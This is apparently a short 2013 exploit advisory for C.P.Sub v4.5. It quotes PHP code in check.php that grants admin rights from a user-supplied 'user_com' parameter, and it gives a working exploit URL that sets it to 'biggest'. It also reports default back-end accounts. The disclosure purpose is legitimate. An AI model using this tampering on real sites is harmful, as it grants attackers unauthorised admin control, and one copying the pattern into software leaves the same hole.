#!/usr/bin/python # # #################################################################### # # Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication # Date: 2013/6/27 # Exploit Author: Chako # Vendor Homepage: http://www.cooltey.org/ping/php.php # Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip # Version: <= v4.5 # Tested on: Windows 7 # # #################################################################### Improper Authentication: ========================================== Description: C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege. Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege. /check.php (LINE: 36-44) -------------------------------------------------------------- if($_GET[user_com] != "") { $user_com = $_GET[user_com]; }elseif($_POST[user_com] != "") { $user_com = $_POST[user_com]; } if($user_com == "biggest") { -------------------------------------------------------------- Exploit: -------------------------------------------------------------- change http://Example_Target/info.php?cookie=yes&user_com=second to http://Example_Target/info.php?cookie=yes&user_com=biggest Misconfiguration ========================================== There are some default accounts for C.P.Sub <= v4.5 that allows an attacker to access back-end management page. It could lead to further attack.